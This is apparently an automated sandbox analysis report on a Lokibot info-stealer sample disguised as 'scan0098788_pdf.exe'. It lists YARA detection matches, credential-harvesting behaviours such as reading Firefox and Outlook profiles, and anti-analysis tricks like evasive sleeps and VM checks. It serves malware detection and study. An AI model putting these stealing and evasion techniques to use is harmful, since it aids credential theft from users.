Source: scan0098788_pdf.exe, 00000000.00000003.792369623.0000000004F94000.00000004.00000001.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs scan0098788_pdf.exe
Source: scan0098788_pdf.exe, 00000000.00000003.795461391.0000000004C05000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameu vs scan0098788_pdf.exe
Source: scan0098788_pdf.exe, 00000000.00000003.795461391.0000000004C05000.00000004.00000001.sdmp | Binary or memory string: FV_ORIGINALFILENAME/ vs scan0098788_pdf.exe
Source: scan0098788_pdf.exe, 00000000.00000003.801572759.000000000471D000.00000004.00000001.sdmp | Binary or memory string: Comments|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild vs scan0098788_pdf.exe
Searches the installation path of Mozilla Firefox
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
Yara signature match
Source: 00000000.00000003.790188914.0000000005591000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.807797640.00000000057D7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.787230238.00000000060B4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.785230005.00000000055F9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.785335673.000000000568C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.757905408.00000000057D7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1171230305.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1171230305.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000003.791806641.00000000060B4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.757815096.000000000568C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.785273546.000000000562C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.787472385.00000000060B4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.789332429.00000000060B4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.791179991.00000000060B4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.789421483.00000000060B4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.816455062.0000000006A60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.816455062.0000000006A60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.scan0098788_pdf.exe.6a60000.1.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.scan0098788_pdf.exe.6a60000.1.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.scan0098788_pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.scan0098788_pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.scan0098788_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.scan0098788_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.scan0098788_pdf.exe.6a60000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.scan0098788_pdf.exe.6a60000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Classification label
Source: classification engine | Classification label: mal100.spyw.evad.winEXE@5/2@0/1
Contains functionality for error logging
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00F4A0F4 GetLastError,FormatMessageW
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F384F3 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F38AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges
Contains functionality to check free disk space
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F4B3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Contains functionality to enum processes or threads
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00F43C99 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Contains functionality to instantiate COM classes
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F584D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,#8,#9
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00EE4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Creates files inside the user directory
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-58933367-3072710494-194312298-1002\4216a73197943a17d1161a6bdc4512b0_59407d34-c8c5-44df-a766-ba8a11cb1cb0
Creates mutexes
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Mutant created: \Sessions\1\BaseNamedObjects\F7EE0CF1CF93AA2F06F12A09
PE file has an executable .text section and no other executable section
Source: scan0098788_pdf.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini files
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Reads software policies
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: scan0098788_pdf.exe | ReversingLabs: Detection: 41%
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\scan0098788_pdf.exe 'C:\Users\user\Desktop\scan0098788_pdf.exe'
Source: unknown | Process created: C:\Users\user\Desktop\scan0098788_pdf.exe C:\Users\user\Desktop\scan0098788_pdf.exe
Source: unknown | Process created: C:\Users\user\Desktop\scan0098788_pdf.exe C:\Users\user\Desktop\scan0098788_pdf.exe
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Process created: C:\Users\user\Desktop\scan0098788_pdf.exe C:\Users\user\Desktop\scan0098788_pdf.exe
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Process created: C:\Users\user\Desktop\scan0098788_pdf.exe C:\Users\user\Desktop\scan0098788_pdf.exe
Checks if Microsoft Office is installed
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Submission file is bigger than most known malware samples
Source: scan0098788_pdf.exe | Static file information: File size 1560576 > 1048576
PE file contains a mix of data directories often seen in goodware
Source: scan0098788_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: scan0098788_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: scan0098788_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: scan0098788_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: scan0098788_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: scan0098788_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
PE file contains a debug data directory
Source: scan0098788_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
PE file contains a valid data directory to section mapping
Source: scan0098788_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: scan0098788_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: scan0098788_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: scan0098788_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: scan0098788_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Yara detected aPLib compressed binary
Source: Yara match | File source: 00000000.00000003.790188914.0000000005591000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.807797640.00000000057D7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.787230238.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.785230005.00000000055F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.785335673.000000000568C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.757905408.00000000057D7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1171230305.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.791806641.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.757815096.000000000568C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.785273546.000000000562C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.787472385.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.789332429.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.791179991.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.789421483.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.816455062.0000000006A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: scan0098788_pdf.exe PID: 1044, type: MEMORY
Source: Yara match | File source: Process Memory Space: scan0098788_pdf.exe PID: 4860, type: MEMORY
Source: Yara match | File source: 0.2.scan0098788_pdf.exe.6a60000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.scan0098788_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.scan0098788_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.scan0098788_pdf.exe.6a60000.1.raw.unpack, type: UNPACKEDPE
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00EE4C95 LoadLibraryA,GetProcAddress
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00F08AC5 push ecx; ret 0_2_00F08AD8
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F08AC5 push ecx; ret 2_2_00F08AD8
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 3_2_00402AC0 push eax; ret 3_2_00402AD4
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 3_2_00402AC0 push eax; ret 3_2_00402AFC

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00EE4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00EE4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F653DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F03307 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\scan0098788_pdf.exe TID: 4256 | Thread sleep time: -600000s >= -30000s
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00F4449B GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F4449B GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F4C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F4C75D FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F4F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F4F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F4F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F43833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F43B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F4BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW
Contains functionality to query system information
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00EE4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: scan0098788_pdf.exe, 00000000.00000003.808745221.0000000004A04000.00000004.00000001.sdmp | Binary or memory string: WOABJAZEDFIPBTLBJYHGFS
Source: scan0098788_pdf.exe, 00000003.00000002.1171632363.0000000000590000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4

Anti Debugging:

